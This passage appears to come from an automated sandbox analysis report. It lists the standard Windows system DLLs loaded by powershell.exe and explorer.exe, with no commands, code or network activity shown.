        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: propsys.dll
        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
        Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
        Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
        Source: C:\Windows\explorer.exeSection loaded: netutils.dll
        Source: C:\Windows\explorer.exeSection loaded: wldp.dll
        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
        Source: C:\Windows\explorer.exeSection loaded: ninput.dll
        Source: C:\Windows\explorer.exeSection loaded: appresolver.dll
        Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\explorer.exeSection loaded: slc.dll
        Source: C:\Windows\explorer.exeSection loaded: sppc.dll
        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
        Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\explorer.exeSection loaded: idstore.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
        Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
        Source: C:\Windows\explorer.exeSection loaded: samcli.dll
        Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dll
        Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
        Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dll
        Source: C:\Windows\explorer.exeSection loaded: winsta.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dll
        Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dll
        Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dll
        Source: C:\Windows\explorer.exeSection loaded: devobj.dll
        Source: C:\Windows\explorer.exeSection loaded: oleacc.dll
        Source: C:\Windows\explorer.exeSection loaded: wintypes.dll
        Source: C:\Windows\explorer.exeSection loaded: textshaping.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.dll
        Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dll
        Source: C:\Windows\explorer.exeSection loaded: textinputframework.dll
        Source: C:\Windows\explorer.exeSection loaded: inputhost.dll
        Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dll
        Source: C:\Windows\explorer.exeSection loaded: dcomp.dll
        Source: C:\Windows\explorer.exeSection loaded: d3d11.dll
        Source: C:\Windows\explorer.exeSection loaded: appextension.dll
        Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dll
        Source: C:\Windows\explorer.exeSection loaded: dxcore.dll
        Source: C:\Windows\explorer.exeSection loaded: d2d1.dll
        Source: C:\Windows\explorer.exeSection loaded: dwrite.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dll
        Source: C:\Windows\explorer.exeSection loaded: xmllite.dll
        Source: C:\Windows\explorer.exeSection loaded: cldapi.dll
        Source: C:\Windows\explorer.exeSection loaded: fltlib.dll
        Source: C:\Windows\explorer.exeSection loaded: dataexchange.dll
        Source: C:\Windows\explorer.exeSection loaded: apphelp.dll
        Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dll
        Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dll
        Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
        Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dll
        Source: C:\Windows\explorer.exeSection loaded: wkscli.dll
        Source: C:\Windows\explorer.exe Section loaded: wincorlib.dll
        Source: C:\Windows\explorer.exe Section loaded: cdp.dll
        Source: C:\Windows\explorer.exe Section loaded: dsreg.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.immersiveshell.serviceprovider.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll
        Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll
        Source: C:\Windows\explorer.exe Section loaded: languageoverlayutil.dll
        Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll
        Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll
        Source: C:\Windows\explorer.exe Section loaded: edputil.dll
        Source: C:\Windows\explorer.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\explorer.exe Section loaded: twinui.appcore.dll
        Source: C:\Windows\explorer.exe Section loaded: twinui.dll
        Source: C:\Windows\explorer.exe Section loaded: pdh.dll
        Source: C:\Windows\explorer.exe Section loaded: applicationframe.dll
        Source: C:\Windows\explorer.exe Section loaded: photometadatahandler.dll
        Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll
        Source: C:\Windows\explorer.exe Section loaded: rmclient.dll
        Source: C:\Windows\explorer.exe Section loaded: cscapi.dll
        Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll
        Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll
        Source: C:\Windows\explorer.exe Section loaded: cscui.dll
        Source: C:\Windows\explorer.exe Section loaded: provsvc.dll
        Source: C:\Windows\explorer.exe Section loaded: holographicextensions.dll
        Source: C:\Windows\explorer.exe Section loaded: virtualmonitormanager.dll
        Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.ui.immersive.dll
        Source: C:\Windows\explorer.exe Section loaded: abovelockapphost.dll
        Source: C:\Windows\explorer.exe Section loaded: npsm.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.web.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.shell.bluelightreduction.dll
        Source: C:\Windows\explorer.exe Section loaded: mscms.dll
        Source: C:\Windows\explorer.exe Section loaded: coloradapterclient.dll
        Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.internal.signals.dll
        Source: C:\Windows\explorer.exe Section loaded: tdh.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorybroker.dll
        Source: C:\Windows\explorer.exe Section loaded: mfplat.dll
        Source: C:\Windows\explorer.exe Section loaded: rtworkq.dll
        Source: C:\Windows\explorer.exe Section loaded: taskflowdataengine.dll
        Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll
        Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.system.launcher.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.security.authentication.web.core.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.shell.servicehostbuilder.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.data.activities.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.internal.ui.shell.windowtabmanager.dll
        Source: C:\Windows\explorer.exe Section loaded: notificationcontrollerps.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.devices.enumeration.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll
        Source: C:\Windows\explorer.exe Section loaded: icu.dll
        Source: C:\Windows\explorer.exe Section loaded: mswb7.dll
        Source: C:\Windows\explorer.exe Section loaded: devdispitemprovider.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.networking.connectivity.dll
        Source: C:\Windows\explorer.exe Section loaded: uianimation.dll
        Source: C:\Windows\explorer.exe Section loaded: windows.ui.core.textinput.dll
        Source: C:\Windows\explorer.exe Section loaded: windowsudk.shellcommon.dll
        Source: C:\Windows\explorer.exe Section loaded: dictationmanager.dll
        Source: C:\Windows\explorer.exe Section loaded: npmproxy.dll
        Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
        Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
        Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
        Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
        Source: C:\Windows\explorer.exe Section loaded: dpapi.dll
        Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
        Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
